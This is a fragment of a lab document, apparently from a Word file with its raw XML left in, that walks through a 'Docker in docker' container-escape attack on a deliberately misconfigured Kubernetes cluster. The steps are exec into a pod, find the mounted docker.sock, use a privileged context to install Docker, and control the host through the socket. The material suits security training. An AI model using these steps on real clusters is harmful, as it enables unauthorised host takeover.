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Attack#2 Docker in docker exploitation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Related configurations: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Attack#2.json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Apply all insecure configs in Attack#2.json.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kubectl exec -it checkoutservice- -n default -- sh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attacker can find the /run/docker.sock mounted in the file system with misconfigurations </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#5 and #6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Command: mount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attacker can exploit privileged securityContext to use root permission(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#1 and #2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to install docker tool from the container for misconfiguration </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#3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Install docker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E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wget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https://download.docker.com/linux/static/stable/x86_64/docker-24.0.6.tgz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tar xzvf docker-24.0.6.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010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mv docker/* /usr/bin/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attacker can access the host system by running the following docker commands with passing docker.sock UNIX socket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docker -H unix:///var/run/docker.soc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drive.google.com/open?id=1azrigE7DYL7cMovlgtMho1O1LO1LjJRz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download.docker.com/linux/static/stable/x86_64/docker-24.0.6.tgz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